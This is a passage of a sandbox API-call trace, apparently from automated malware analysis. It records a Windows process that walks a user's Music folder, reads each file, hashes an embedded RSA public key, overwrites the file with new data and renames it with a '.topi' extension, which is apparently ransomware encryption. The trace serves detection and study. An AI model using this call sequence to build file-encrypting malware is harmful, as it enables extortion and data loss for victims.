hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93f0 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9420 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9408 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f19f8 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.240] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xff24, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xff24, lpOverlapped=0x0) returned 1 [0095.241] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.241] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xff29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.241] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.241] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.241] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.241] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.241] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.241] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.241] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.241] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.242] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.242] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.242] CloseHandle (hObject=0x6a8) returned 1 [0095.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.255] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FM IT1z0r5x6P3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fm it1z0r5x6p3.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FM IT1z0r5x6P3.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fm it1z0r5x6p3.m4a.topi")) returned 1 [0095.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.255] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.257] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9d09a0, ftCreationTime.dwHighDateTime=0x1d5c24e, ftLastAccessTime.dwLowDateTime=0x459b79e0, ftLastAccessTime.dwHighDateTime=0x1d5c0d2, ftLastWriteTime.dwLowDateTime=0x459b79e0, ftLastWriteTime.dwHighDateTime=0x1d5c0d2, nFileSizeHigh=0x0, nFileSizeLow=0xf8bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4JY_jz9eXsr.mp3", cAlternateFileName="H4JY_J~1.MP3")) returned 1 [0095.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.257] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H4JY_jz9eXsr.mp3") returned=".mp3" [0095.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H4JY_jz9eXsr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h4jy_jz9exsr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.257] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=63675) returned 1 [0095.257] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.261] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf895, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.261] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.262] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.262] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.262] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xf8bb, lpOverlapped=0x0) returned 1 [0095.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.262] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.263] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.263] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.263] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.264] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.264] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.264] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.264] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.264] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.264] GetLastError () returned 0x0 [0095.264] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.264] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.264] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.264] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.264] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.264] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.264] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.264] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf8c0) returned 0x9a06a00 [0095.265] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.265] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f19f8 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1a40 [0095.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9408 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9420 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.266] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.266] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9408 | out: hHeap=0x680000) returned 1 [0095.266] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9420 | out: hHeap=0x680000) returned 1 [0095.266] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.266] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.266] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9420 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9408 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9420 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9408 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.267] GetCurrentThreadId () returned 0x8c4 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5e30 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.268] GetCurrentThreadId () returned 0x8c4 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.268] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.269] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9408 [0095.269] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.269] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.269] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9420 [0095.270] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.270] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.271] MoveFileW 